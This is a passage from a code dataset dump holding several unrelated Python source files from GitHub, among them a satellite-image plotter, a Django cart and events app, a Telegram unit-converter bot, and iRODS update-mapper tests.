np.amin(bool_arr_ind[1]), np.amax(bool_arr_ind[1])\n raw = raw[ymin:ymax, xmin:xmax]\n lat = lat[ymin:ymax, xmin:xmax]\n lon = lon[ymin:ymax, xmin:xmax]\n return raw, lon, lat\n\n def merger(self, channel):\n finest_resolution = min([self.fileclass.resolution[c] for c in channel])\n temp_raw = {}\n for c in channel:\n if c not in temp_raw.keys():\n if self.fileclass.resolution[c] != finest_resolution:\n multifier = self.fileclass.resolution[c] // finest_resolution\n temp_raw[c] = np.kron(self.load_channel_8bit(c), np.ones((multifier, multifier)))\n else:\n temp_raw[c] = self.load_channel_8bit(c)\n return np.dstack((temp_raw[channel[0]], temp_raw[channel[1]], temp_raw[channel[2]]))\n\n def remap_rgb(self, channel):\n for i in range(3):\n fig = plt.figure(figsize=self.figsize)\n choice = 'Common', channel[i]\n mat, lon, lat = self.load_masked_raw_geocoord(choice)\n self.map.pcolormesh(lon, lat, mat, latlon=True, cmap=self.get_colormap(choice))\n plt.axis('off')\n plt.tight_layout(pad=0.)\n plt.savefig(join(self.fid['fdir'], 'TMP%d.png' % (i)), dpi=self.dpi)\n plt.clf()\n return np.dstack(tuple([plt.imread(join(self.fid['fdir'], 'TMP%d.png' % (i)))[:,:,0] for i in range(3)]))\n\n def processor(self):\n for i in range(len(self.choices)):\n ch = self.choices.pop()\n print('正在制作' + self.get_imtype(ch).upper() + '...')\n self.imager(ch)\n self.clear_unnecessary_channel()\n \n def imager(self, choice):\n fig = plt.figure(figsize=self.figsize)\n ax = fig.add_axes([0, 0, 1, 1])\n if not self.fileclass.remap:\n mat = self.load_raw(choice)\n plt.imshow(mat, interpolation='nearest', extent=[self.georange[2], self.georange[3], self.georange[0], self.georange[1]],\n **self.get_imager_kwargs(choice))\n elif choice[0] != 'Composite':\n mat, lon, lat = self.load_masked_raw_geocoord(choice)\n self.map.pcolormesh(lon, lat, mat, latlon=True, **self.get_imager_kwargs(choice))\n del lon, lat\n else:\n mat = self.load_raw(choice)\n plt.imshow(mat, interpolation='nearest', extent=[self.georange[2], self.georange[3], self.georange[0], self.georange[1]])\n if choice[0] not in ('Common', 'Composite') and self.settings['switch']['maxtbb']:\n print('(仅供参考)最高云顶温度: %.2fdegC' % (np.amax(mat)))\n del mat\n if self.settings['switch']['title']:\n plt.annotate(self.title, xy=(0.04,0.04), va='bottom', xycoords='axes fraction',\n bbox=dict(facecolor='w', edgecolor='none', alpha=0.5), fontsize=12, family=self.title_font, weight=self.title_weight)\n plt.annotate((self.basic_info+self.get_imtype(choice)).upper(), xy=(0.5,0), va='bottom', ha='center', xycoords='axes fraction',\n bbox=dict(facecolor='w', edgecolor='none', alpha=0.7), fontsize=6, family=self.settings['font']['info'], weight=self.settings['font']['info_weight'])\n if self.settings['switch']['coastline']:\n self.map.drawcoastlines(**self.settings['coastline'])\n if self.settings['switch']['borderline']:\n self.map.drawcountries(**self.settings['borderline'])\n if self.settings['switch']['latlon']:\n self.map.drawparallels(range(-90,90,self.settings['latlon']['step']), linewidth=self.settings['latlon']['width'],\n dashes=(None, None), color=self.settings['latlon']['color'])\n self.map.drawmeridians(range(0,360,self.settings['latlon']['step']), linewidth=self.settings['latlon']['width'],\n dashes=(None, None), color=self.settings['latlon']['color'])\n plt.axis('off')\n #plt.tight_layout(pad=0.)\n plt.savefig(join(self.fid['fdir'], self.get_imtype(choice).upper() + self.fid['time'] + '.png'),\n dpi=self.dpi, facecolor=self.settings['image']['background'])\n plt.clf()\n\ndef launcher(path='.'):\n FS = FileSearch(path)\n Satima(FS)\n\nlauncher()\n","repo_name":"crazyapril/satima","sub_path":"Satima.py","file_name":"Satima.py","file_ext":"py","file_size_in_byte":14630,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"15417957343","text":"from .models import Order, Product, HistoryProducts\n\n\nclass CartForAuthenticatedUser:\n def __init__(self, request, product_slug=None, product_color=None, action=None):\n self.user = request.user\n\n if product_slug and product_color and action:\n self.add_or_delete(product_slug=product_slug, product_color=product_color, action=action)\n elif product_slug and product_color:\n self.delete_product(product_slug=product_slug, product_color=product_color)\n\n def get_cart_info(self):\n order, _ = Order.objects.get_or_create(user=self.user, is_completed=False)\n products = order.orderproduct_set.all()\n cart_total_quantity = order.get_cart_total_quantity\n cart_total_price = order.get_cart_total_price\n\n return {\n 'cart_total_quantity': cart_total_quantity,\n 'cart_total_price': cart_total_price,\n 'order_products': products,\n 'order': order\n }\n\n def add_or_delete(self, product_slug, product_color, action):\n order = self.get_cart_info()['order']\n product = Product.objects.get(slug=product_slug)\n order_product, created = order.orderproduct_set.get_or_create(product=product, color_title=product_color)\n\n if action == 'add' and product.quantity_in_storage > 0:\n product.quantity_in_storage -= 1\n order_product.quantity += 1\n else:\n product.quantity_in_storage += 1\n order_product.quantity -= 1\n\n product.save()\n order_product.save()\n\n if order_product.quantity <= 0:\n order_product.delete()\n\n def clear(self):\n order = self.get_cart_info()['order']\n order_products = order.orderproduct_set.all()\n for order_product in order_products:\n history = HistoryProducts.objects.create(user=self.user)\n history.product = order_product.product\n history.order_number = order_product.order.pk\n history.price = order_product.get_total_price\n history.quantity = order_product.quantity\n history.save()\n order_product.delete()\n order.save()\n\n def delete_product(self, product_slug, product_color):\n order = self.get_cart_info()['order']\n order_product = order.orderproduct_set.get(product__slug=product_slug, color_title=product_color)\n order_product.delete()\n order.save()\n","repo_name":"SarvarAi/LoftMebel","sub_path":"loft/store/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23463989444","text":"import telebot\nimport database\n\nmain_units = ['m', 'g', 's']\nunits_1 = {'mm': 1000, 'cm': 100, 'in': 39.37, 'dm': 10, 'ft': 3.281, 'm': 1, 'km': 0.001, 'mi': 0.000621371}\nunits_2 = {'mg': 1000, 'dag': 10, 'g': 1, 'oz': 0.03527396, 'lb': 0.00220462, 'kg': 0.001, 't': 0.000001}\nunits_3 = {'ms': 1000, 's': 1, 'min': 1/60, 'h': 1/3600, 'd': 1/86400, 'wk': 1/604800, 'mo': 1/2592000, 'yr': 1/31536000}\n\n# check if the message contains any known unit\ndef check_message(message: telebot.types.Message) -> tuple[int, str, str]:\n text = message.text\n #-------------------------------------------------------\n text_test = text.replace(' ', '')\n units = sorted(list(units_1.keys()), key=len, reverse=True)\n unit = ''\n for element in units:\n if element in text_test:\n unit = element\n text_test = text_test.replace(element, '')\n break\n if text_test.replace('.', '').isdigit():\n return (1, unit, text_test)\n #-------------------------------------------------------\n text_test = text.replace(' ', '')\n units = sorted(list(units_2.keys()), key=len, reverse=True)\n unit = ''\n for element in units:\n if element in text_test:\n unit = element\n text_test = text_test.replace(element, '')\n break\n if text_test.replace('.', '').isdigit():\n return (2, unit, text_test)\n #-------------------------------------------------------\n text_test = text.replace(' ', '')\n units = sorted(list(units_3.keys()), key=len, reverse=True)\n unit = ''\n for element in units:\n if element in text_test:\n unit = element\n text_test = text_test.replace(element, '')\n break\n if text_test.replace('.', '').isdigit():\n return (3, unit, text_test)\n #-------------------------------------------------------\n return (0, '', '')\n\n# get number with its unit to main unit\ndef get_to_main_unit(num: float, unit: str, x: int) -> float:\n if x == 1:\n return num/units_1[unit]\n elif x == 2:\n return num/units_2[unit]\n elif x == 3:\n return num/units_3[unit]\n\n# change unit and send message to user\ndef change_unit(num: float, x: int) -> str:\n msg = ''\n if x == 1:\n for unit in list(units_1.keys()):\n _ = \"{:g}\".format(num * units_1[unit])\n msg = msg + telebot.telebot.formatting.hitalic(unit + \": \") + _ + \"\\n\"\n elif x == 2:\n for unit in list(units_2.keys()):\n _ = \"{:g}\".format(num * units_2[unit])\n msg = msg + telebot.telebot.formatting.hitalic(unit + \": \") + _ + \"\\n\"\n elif x == 3:\n for unit in list(units_3.keys()):\n _ = \"{:g}\".format(num * units_3[unit])\n msg = msg + telebot.telebot.formatting.hitalic(unit + \": \") + _ + \"\\n\"\n return msg\n\n# handle messages with known units\ndef message_handler(message: telebot.types.Message, bot: telebot.TeleBot):\n text1 = database.get_message_text(message, 'unitconverter')\n x, unit, num = check_message(message)\n _num = num\n try:\n num = float(num)\n except:\n text2 = database.get_message_text(message, 'error')\n mess = bot.send_message(message.chat.id, telebot.telebot.formatting.hbold(text1 + \":\\n\\n\") + text2, parse_mode = 'html')\n database.register_last_message(mess)\n msg = database.get_message_text(message, 'error')\n if x > 0:\n if unit in main_units:\n msg = change_unit(num, x)\n else:\n num = get_to_main_unit(num, unit, x)\n msg = change_unit(num, x)\n text2 = telebot.telebot.formatting.hbold(unit + \": \" + _num)\n mess = bot.send_message(message.chat.id, telebot.telebot.formatting.hbold(text1 + \":\\n\\n\") + text2 + \"\\n\" + msg[:-1], parse_mode = 'html')\n database.register_last_message(mess)","repo_name":"Cezary924/Telegram-Bot","sub_path":"bot/unit_converter.py","file_name":"unit_converter.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"41954223539","text":"\"\"\"\nCheck Prime\n\"\"\"\n\nn = int(input('Enter a number to check if it is prime: '))\n\ndef checkPrime(n):\n if n <= 1:\n return False\n\n if n == 2:\n return True\n\n i = 2\n while i < n:\n if n % i == 0:\n return False\n i += 1\n\n return True\n\nprint(checkPrime(n))\n","repo_name":"therealyash/Coding-Programs","sub_path":"Coding Programs/Programs/Check Prime.py","file_name":"Check Prime.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"31555740639","text":"# coding=utf-8\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.core.validators import MinValueValidator\nfrom django.template.defaultfilters import slugify\nfrom django.utils.translation import ugettext as _\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_delete\nimport django.utils.timezone as timezone\nfrom solo.models import SingletonModel\nimport events.register as eregister\nfrom users import permissions\nfrom base.fields import ValidatedRichTextField\nimport itertools\nimport logging\n\nfrom operator import attrgetter\n\n\nlogger = logging.getLogger(__name__)\n\nPERMISSION_CHOICES = (\n (eregister.CAN_VIEW_AND_JOIN_PUBLIC_EVENTS, \"Public event\"),\n (eregister.CAN_VIEW_AND_JOIN_MEMBER_EVENTS, \"Members-only event\"),\n (eregister.CAN_VIEW_AND_JOIN_BOARD_MEMBER_EVENTS, \"Board members-only event\"),\n)\n\n# This is used when the user has been adding event items to an event after signups has been made\nVALUE_DOES_NOT_EXIST = \"not_set\"\n\n\n# TODO if the field is a boolean, it should return False / True\n# TODO if the field is a integer or float, it should return appropriate type!\nclass MultiInputField(models.CharField):\n # In an ideal world this field would save different types of values and return the right python object\n # Sadly this seems rather impossible (at least as of Django 1.7)\n # hours_wasted_here = 3\n # Please increment counter as a warning to future programmers.\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n# This is an actual event, for example a Christmas party\nclass Event(models.Model):\n title = models.CharField(max_length=100)\n slug = models.SlugField(unique=True)\n text = ValidatedRichTextField(verbose_name=\"Description\")\n start = models.DateTimeField(verbose_name=\"Event ends\")\n stop = models.DateTimeField(verbose_name=\"Event starts\")\n author = models.ForeignKey(User)\n signup_start = models.DateTimeField(verbose_name=\"Signup starts\", default=timezone.now)\n signup_deadline = models.DateTimeField(verbose_name=\"Deadline for signups\")\n permission = models.CharField(max_length=100, choices=PERMISSION_CHOICES,\n default=eregister.CAN_VIEW_AND_JOIN_PUBLIC_EVENTS)\n max_participants = models.IntegerField(validators=[MinValueValidator(1)], default=50)\n use_captcha = models.BooleanField(default=False, verbose_name=\"Use captcha when anonymous people sign up\")\n send_email_for_reserves = models.BooleanField(\n default=True,\n verbose_name=\"Send email when someone is moved from reserve list to attending\"\n )\n allow_late_reserve_changes = models.BooleanField(\n default=True,\n verbose_name=\"Allow moving someone from reserve to attending when the event is about to start. \" +\n \"(set to 5 hours by default)\"\n )\n\n def __str__(self):\n return str(self.title)\n\n def get_absolute_url(self):\n return reverse(\"events_view_event\", kwargs={'slug': self.slug})\n\n def is_before_signup_start(self):\n return timezone.now() < self.signup_start\n\n def is_past_signup_deadline(self):\n return timezone.now() > self.signup_deadline\n\n # https://keyerror.com/blog/automatically-generating-unique-slugs-in-django\n def save(self, *args, **kwargs):\n if not self.id:\n # Newly created object, so set slug and ensure it is unique\n\n max_length = Event._meta.get_field('slug').max_length\n temp_slug = orig = slugify(self.title)[:max_length]\n for x in itertools.count(1):\n if not Event.objects.filter(slug=temp_slug).exists():\n break\n\n # Truncate the original slug dynamically. Minus 1 for the hyphen.\n temp_slug = \"%s-%d\" % (orig[:max_length - len(str(x)) - 1], x)\n\n self.slug = temp_slug\n super().save(*args, **kwargs)\n\n @classmethod\n def current_events(cls):\n \"\"\"\n Returns all events that haven't ended yet\n :return:\n \"\"\"\n return cls.objects.filter(stop__gte=timezone.now())\n\n def get_items(self):\n return ItemInEvent.objects.filter(event=self).order_by('item__id')\n\n def count_participants(self):\n return EventSignup.objects.filter(event=self).count()\n\n def user_can_view_and_join(self, user):\n print(self.permission)\n return permissions.has_user_perm(user, self.permission)\n\n def fancy_daterange(self):\n \"\"\"\n Returns a nicer version of \"startdate - enddate\"\n Example: instead of 22.2.2015 - 23.2.2015 this should return something like 22-23.2.2015\n \"\"\"\n if self.start.year == self.stop.year:\n if self.start.month == self.stop.month:\n if self.start.day == self.stop.day:\n return \"{0}.{1}.{2}\".format(self.stop.day, self.stop.month, self.stop.year)\n return \"{0} - {1}.{2}.{3}\".format(self.start.day,\n self.stop.day, self.stop.month, self.stop.year)\n return \"{0}.{1} - {2}.{3}.{4}\".format(self.start.day, self.start.month,\n self.stop.day, self.stop.month, self.stop.year)\n # note: does the following ever make sense?\n elif self.start.day == self.stop.day and self.start.month == self.stop.month:\n return \"{0}.{1}.{2} - {3}\".format(self.start.day, self.start.month, self.start.year,\n self.stop.year)\n\n return \"{0}.{1}.{2} - {3}.{4}.{5}\".format(self.start.day, self.start.month, self.start.year,\n self.stop.day, self.stop.month, self.stop.year)\n\n def get_summary(self):\n if len(self.text) > 300:\n summary = ValidatedRichTextField.get_summary(self.text, 300)\n return \"%s

...

\" % summary\n else:\n return self.text\n\n def is_late(self):\n late_time = EventSettings.instance().late_signup_time_hours\n late = self.start - timezone.now() < timezone.timedelta(hours=late_time)\n return late\n\n def can_reserve_person_attend(self):\n \"\"\"\n Checks if this event allows moving a person from the reserve list to attending right now\n :return:\n \"\"\"\n too_late = self.is_late() and not self.allow_late_reserve_changes\n already_started = self.start < timezone.now()\n return self.send_email_for_reserves and not too_late and not already_started\n\n\n# Each user which signs up creates one of these\n# We need both user and name as we need to allow non-signed in users to sign up\nclass EventSignup(models.Model):\n event = models.ForeignKey(Event)\n user = models.ForeignKey(User, blank=True, null=True)\n name = models.CharField(max_length=100, verbose_name=\"Full name\")\n email = models.EmailField()\n created = models.DateTimeField(auto_now_add=True, blank=True)\n auth_code = models.CharField(max_length=32, unique=True) # Edit and delete for anonymous users\n on_reserve_list = models.BooleanField(default=False)\n\n class Meta:\n ordering = \"created\",\n\n def user_can_edit(self, user):\n if self.user == user or permissions.has_user_perm(user, eregister.CAN_CREATE_EVENTS):\n return True\n else:\n return False\n\n def __str__(self):\n return \"{0}:{1} has signed up for {2}\".format(self.created, self.name, self.event)\n\n def send_reserve_email(self, old_signup):\n \"\"\"\n\n :param old_signup: The signup that was canceled\n :return:\n \"\"\"\n\n context = Context({\n 'event': self.event,\n 'old_signup': old_signup,\n 'late': self.event.is_late()\n })\n template = get_template(\"events/emails/reserve_notify.html\")\n message = template.render(context)\n title = _(\"Reserve notification for\") + \" \" + self.event.title\n from_email = settings.NO_REPLY_EMAIL\n to_emails = [self.email]\n send_mail(title, message, from_email, to_emails)\n\n def build_email_content(self, request):\n context = Context({\n 'request': request,\n 'event': self.event,\n 'signup': self,\n 'signup_edit_url':\n request.build_absolute_uri(reverse(\"events_view_event_edit_signup_by_code\",\n kwargs={'event_id': self.event.id,\n 'auth_code': self.auth_code})),\n 'signup_cancel_url':\n request.build_absolute_uri(reverse(\"events_delete_event_signup_by_code\",\n kwargs={'auth_code': self.auth_code})),\n })\n\n template = get_template(\"events/emails/signup_email.html\")\n return template.render(context)\n\n def is_reserve(self):\n return self.on_reserve_list\n\n def get_items(self):\n return ItemInSignup.objects.filter(signup=self).order_by('item__id')\n\n # This function excludes items which has been removed from the event after signup was made\n # It also adds \"missing\" items, which exists if item events are added to event after signup was created\n def get_items_relevant(self):\n # Only these items should be returned even if more are saved\n items_in_event = ItemInEvent.objects.filter(event=self.event)\n items_in_event_itemonly = ItemInEvent.objects.filter(event=self.event).values('item')\n\n items_in_signup = ItemInSignup.objects.filter(signup=self). \\\n filter(item__in=items_in_event_itemonly).order_by('item__id')\n\n items_in_signup_items = items_in_signup.values('item')\n # Get all items which are configured for event but is not in signup\n missing_items = items_in_event.exclude(item__in=items_in_signup_items)\n result = list(items_in_signup)\n\n # Add missing items\n for item_in_event in missing_items:\n fake_item_in_signup = ItemInSignup()\n fake_item_in_signup.signup_id = self\n fake_item_in_signup.value = VALUE_DOES_NOT_EXIST\n fake_item_in_signup.item = item_in_event.item\n result.append(fake_item_in_signup)\n\n # Needs to be sorted to get in right column\n result.sort(key=attrgetter('item.id'))\n return result\n\n\n@receiver(post_delete, sender=EventSignup, dispatch_uid=\"events_cancel_signup\")\ndef signups_cancel_signup(**kwargs):\n \"\"\"\n When a signup is canceled, check if there's anyone on the reserve list.\n :param kwargs:\n :return:\n \"\"\"\n instance = kwargs.pop(\"instance\")\n\n if instance.event.can_reserve_person_attend() and not instance.is_reserve():\n # Notify a user on the reserve list that they're in by email\n try:\n signups = EventSignup.objects.filter(event=instance.event, on_reserve_list=False)\n if signups.count() < instance.event.max_participants:\n # Get the signup that just got below the participant limit\n first_on_reserve = EventSignup.objects.filter(event=instance.event,\n on_reserve_list=True\n ).order_by(\"created\").first()\n first_on_reserve.send_reserve_email(instance)\n first_on_reserve.on_reserve_list = False\n first_on_reserve.save()\n except Exception as e:\n logger.error(\"Sending reserve email failed (%s)\", e)\n\n\nclass EventItem(models.Model):\n TYPE_BOOL = 'B'\n TYPE_STR = 'S'\n TYPE_TEXT = 'T'\n TYPE_INT = 'I'\n TYPE_CHOICE = 'C'\n TYPE_CHOICES = (\n (TYPE_BOOL, 'Checkbox'),\n (TYPE_STR, 'Text (one line)'),\n (TYPE_TEXT, 'Text (multiple lines)'),\n (TYPE_INT, 'Integer'),\n (TYPE_CHOICE, 'Choice'),\n )\n\n name = models.CharField(max_length=100)\n required = models.BooleanField(default=False, verbose_name=_(\"Is this field mandatory\"))\n public = models.BooleanField(default=False,\n verbose_name=_(\"Is this field shown to everyone?\",))\n hide_in_print_view = models.BooleanField(default=False,\n verbose_name=_(\"Is this field hidden from the print view?\",))\n type = models.CharField(\n max_length=1, choices=TYPE_CHOICES, default=TYPE_INT,\n verbose_name=\"Data type\",\n help_text=_(\"Decides what kind of data is allowed in this field. The options are:
\" +\n \"Checkbox: A simple checkbox (yes/no)
\" +\n \"Text (one line): A text field with one line
\" +\n \"Text (multiple lines): A larger resizeable text field that allows multiple lines
\" +\n \"Integer: A number
\" +\n \"Choice: A multiple-choices field. syntax for name: \" +\n \"question//alternative1//alternative2//alternative3\")\n )\n\n def __str__(self):\n return str(self.name)\n\n def get_name(self):\n if self.type == self.TYPE_CHOICE:\n return str(self.name.split(\"//\")[0])\n else:\n return str(self.name)\n\n\n# This is for setting which items can be set when signing up to event\nclass ItemInEvent(models.Model):\n event = models.ForeignKey(Event)\n item = models.ForeignKey(EventItem)\n\n def __str__(self):\n return str(\"{0} is enabled in {1}\".format(self.item.name, self.event.title))\n\n\n# This is for one specific signup\nclass ItemInSignup(models.Model):\n signup = models.ForeignKey(EventSignup)\n item = models.ForeignKey(EventItem)\n value = MultiInputField(max_length=500, null=True, blank=True)\n\n def __str__(self):\n return str(\"{0} signed up with {1}: {2}\".format(self.signup.name, self.item.name, self.get_value()))\n\n def get_value(self):\n if self.value == VALUE_DOES_NOT_EXIST:\n return _(\"(not set)\") # This string is shown for event items without a set value\n if self.value is None:\n return None\n if self.item.type in (EventItem.TYPE_CHOICE, EventItem.TYPE_STR, EventItem.TYPE_TEXT):\n return str(self.value)\n if self.item.type == EventItem.TYPE_BOOL:\n if self.value == \"True\":\n return True\n elif self.value == \"False\":\n return False\n else:\n raise TypeError()\n if self.item.type == EventItem.TYPE_INT:\n return int(self.value)\n else:\n raise NotImplementedError()\n\n\nclass EventSettings(SingletonModel):\n is_setup = models.BooleanField(default=False)\n # The amount of hours, before an event starts, that is considered late\n # This is used when deciding whether to tell people on the reserve list to print the notification email.\n late_signup_time_hours = models.IntegerField(default=5)\n\n @classmethod\n def instance(cls):\n instance, created = cls.objects.get_or_create()\n return instance\n\n","repo_name":"Lundis/SAW","sub_path":"studassweb/events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5140454571","text":"#!/usr/bin/env python3\n\"\"\"Base class for theoretical distributions.\"\"\"\n\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass, astuple\nfrom enum import Enum, auto\nfrom logging import warning\n\nimport numpy as np\n\nfrom distribution.distribution import Distribution\nfrom distribution.empirical_distribution import EmpiricalDistribution\n\n\nclass TheoreticalDistribution(Distribution):\n \"\"\"Represents a theoretical degree distribution.\"\"\"\n\n class Type(Enum):\n \"\"\"Type of the theoretical distribution.\"\"\"\n\n UNIFORM: int = auto()\n POISSON: int = auto()\n POWER_LAW: int = auto()\n NORMAL: int = auto()\n STABLE: int = auto()\n INVALID: int = auto()\n\n @dataclass\n class Parameters:\n \"\"\"Represent the parameters of the distribution.\"\"\"\n\n @dataclass\n class FittingParameters:\n \"\"\"Parameters of how the fitting should be done.\"\"\"\n\n @dataclass\n class DomainCalculation:\n \"\"\"Parameters of domain calculation.\"\"\"\n\n @dataclass\n class ParameterFitting:\n \"\"\"Parameters of domain calculation.\"\"\"\n\n domain_calculation: DomainCalculation\n parameter_fitting: ParameterFitting\n\n def __init__(self) -> None:\n \"\"\"Create a default theoretical distribution.\"\"\"\n super().__init__()\n self._parameters = TheoreticalDistribution.Parameters()\n\n def fit(self, empirical_distribution: EmpiricalDistribution, fitting_parameters: FittingParameters) -> None:\n \"\"\"Fit the parameters of the probability distribution.\"\"\"\n if len(empirical_distribution.value_sequence) < 2:\n warning(\n f'Empirical degree distribution contains {len(empirical_distribution.value_sequence)} in the domain.')\n self._valid = False # pylint: disable=attribute-defined-outside-init\n return\n\n self._fit_domain(empirical_distribution, fitting_parameters.domain_calculation)\n if not self.domain.valid:\n return\n\n self._fit_parameters(empirical_distribution, fitting_parameters.parameter_fitting)\n self._valid = not any( # pylint: disable=attribute-defined-outside-init\n np.isnan(x)\n for x in astuple(self._parameters)\n ) and self.domain.valid\n\n def _fit_domain(\n self,\n empirical_distribution: EmpiricalDistribution,\n domain_calculation_parameters: FittingParameters.DomainCalculation,\n ) -> None:\n raise NotImplementedError\n\n def _fit_parameters(\n self,\n empirical_distribution: EmpiricalDistribution,\n parameter_fitting_parameters: FittingParameters.ParameterFitting,\n ) -> None:\n raise NotImplementedError\n\n @property\n def parameters(self) -> Parameters:\n \"\"\"Return the parameters of the distribution.\"\"\"\n return self._parameters\n","repo_name":"shepherd92/network_simulator","sub_path":"distribution/theoretical/theoretical_distribution.py","file_name":"theoretical_distribution.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1500314288","text":"import os,sys\nimport os.path\nfrom os import path\nfrom CustomisedFileOperation import * \n\nif __name__==\"__main__\":\n\tinput_directory=sys.argv[1]\n\tfor root, dirs, files in os.walk(input_directory):\n\t\tcount=0\n\t\tfor each_file in files:\n\t\t\tcount+=1\n\t\t\ttemp_file=str(each_file)+'\\n'\n\t\t\tprint (count,each_file)\n\t\t\twrite_into_file(file_name='file_names.txt',contents=temp_file,mode='a')\n\t\tbreak\t\t\n","repo_name":"infotechaji/GeneralCodes","sub_path":"SQL_automation/StubAddition/FileNameExtraction.py","file_name":"FileNameExtraction.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"39636898760","text":"import logging\nimport math\nimport unittest\nfrom datetime import datetime\nfrom os.path import join\n\nfrom testwithirods.helpers import SetupHelper\n\nfrom baton.collections import DataObjectReplicaCollection, IrodsMetadata\nfrom baton.models import DataObjectReplica\nfrom cookiemonster.retriever.source.irods._constants import MODIFIED_METADATA_QUERY_ALIAS\nfrom cookiemonster.retriever.source.irods.baton_mappers import BatonUpdateMapper, MODIFIED_DATA_QUERY_ALIAS\nfrom cookiemonster.retriever.source.irods.json_convert import DataObjectModificationJSONEncoder\nfrom cookiemonster.retriever.source.irods.models import DataObjectModification\nfrom cookiemonster.tests.retriever.source.irods._helpers import install_queries\nfrom cookiemonster.tests.retriever.source.irods._settings import BATON_SETUP\nfrom hgicommon.collections import Metadata\nfrom testwithbaton.api import TestWithBaton\n\nREQUIRED_SPECIFIC_QUERIES = {\n MODIFIED_DATA_QUERY_ALIAS: join(\"resources\", \"specific-queries\", \"data-modified-partial.sql\"),\n MODIFIED_METADATA_QUERY_ALIAS: join(\"resources\", \"specific-queries\", \"metadata-modified-partial.sql\")\n}\n\n_DATA_OBJECT_NAMES = [\"data_object_1\", \"data_object_2\"]\n_METADATA_KEYS = [\"key_1\", \"key_2\"]\n_METADATA_VALUES = [\"value_1\", \"value_2\", \"value_2\"]\n\n_MAX_IRODS_TIMESTAMP = int(math.pow(2, 31)) - 1\n\n\nclass TestBatonUpdateMapper(unittest.TestCase):\n \"\"\"\n Tests for `BatonUpdateMapper`.\n \"\"\"\n def setUp(self):\n self.test_with_baton = TestWithBaton(baton_setup=BATON_SETUP)\n self.test_with_baton.setup()\n self.setup_helper = SetupHelper(self.test_with_baton.icommands_location)\n install_queries(REQUIRED_SPECIFIC_QUERIES, self.setup_helper)\n\n zone = self.test_with_baton.irods_server.users[0].zone\n self.mapper = BatonUpdateMapper(self.test_with_baton.baton_location, zone)\n\n def test_get_all_since_with_date_in_future(self):\n updates = self.mapper.get_all_since(datetime.fromtimestamp(_MAX_IRODS_TIMESTAMP))\n self.assertEqual(len(updates), 0)\n\n def test_get_all_since_with_date_in_past(self):\n start_timestamp = self._get_latest_update_timestamp()\n\n updates = self.mapper.get_all_since(start_timestamp)\n self.assertEqual(len(updates), 0)\n\n def test_get_all_since_with_data_object_updates(self):\n start_timestamp = self._get_latest_update_timestamp()\n location_1 = self.setup_helper.create_data_object(_DATA_OBJECT_NAMES[0])\n location_2 = self.setup_helper.create_data_object(_DATA_OBJECT_NAMES[1])\n\n updates = self.mapper.get_all_since(start_timestamp)\n self.assertEqual(len(updates), 2)\n self.assertEqual(len(updates.get_entity_updates(location_1)), 1)\n self.assertEqual(len(updates.get_entity_updates(location_2)), 1)\n # TODO: More detailed check on updates\n\n def test_get_all_since_with_updates_to_data_object_replica(self):\n start_timestamp = self._get_latest_update_timestamp()\n location = self.setup_helper.create_data_object(_DATA_OBJECT_NAMES[0])\n resource = self.setup_helper.create_replica_storage()\n self.setup_helper.replicate_data_object(location, resource)\n self.setup_helper.update_checksums(location)\n\n checksum = self.setup_helper.get_checksum(location)\n replicas = DataObjectReplicaCollection([DataObjectReplica(i, checksum) for i in range(2)])\n expected_modification = DataObjectModification(modified_replicas=replicas)\n expected_metadata = Metadata(DataObjectModificationJSONEncoder().default(expected_modification))\n\n updates = self.mapper.get_all_since(start_timestamp)\n self.assertEquals(len(updates), 1)\n self.assertIn(updates[0].target, location)\n self.assertCountEqual(updates[0].metadata, expected_metadata)\n\n def test_get_all_since_with_metadata_update(self):\n path = self.setup_helper.create_data_object(_DATA_OBJECT_NAMES[0])\n start_timestamp = self._get_latest_update_timestamp()\n\n metadata_1 = Metadata({\n _METADATA_KEYS[0]: _METADATA_VALUES[0],\n _METADATA_KEYS[1]: _METADATA_VALUES[1]\n })\n self.setup_helper.add_metadata_to(path, metadata_1)\n # Update pre-existing metadata item\n metadata_2 = Metadata({_METADATA_KEYS[0]: _METADATA_VALUES[2]})\n self.setup_helper.add_metadata_to(path, metadata_2)\n expected_irods_metadata = IrodsMetadata({\n _METADATA_KEYS[0]: {_METADATA_VALUES[0], _METADATA_VALUES[2]},\n _METADATA_KEYS[1]: {_METADATA_VALUES[1]}\n })\n\n modification = DataObjectModification(modified_metadata=expected_irods_metadata)\n expected_update_metadata = Metadata(DataObjectModificationJSONEncoder().default(modification))\n\n updates = self.mapper.get_all_since(start_timestamp)\n self.assertEqual(len(updates), 1)\n relevant_updates = updates.get_entity_updates(path)\n # Expect the mapper to have combined all updates into one (https://github.com/wtsi-hgi/cookie-monster/issues/3)\n self.assertEqual(len(relevant_updates), 1)\n self.assertEqual(relevant_updates[0].target, path)\n logging.debug(relevant_updates[0].metadata)\n logging.debug(expected_update_metadata)\n self.assertCountEqual(relevant_updates[0].metadata, expected_update_metadata)\n\n def _get_latest_update_timestamp(self) -> datetime:\n \"\"\"\n Gets the timestamp of the latest update. If there has been no updates, returns minimum timestamp.\n\n This timestamp is useful to get before running a test for use in filtering out any updates that iRODS\n already has. The Dockerized iRODS 3.3.1, for example, will have updates on start.\n :return: timestamp of latest update\n \"\"\"\n inital_updates = 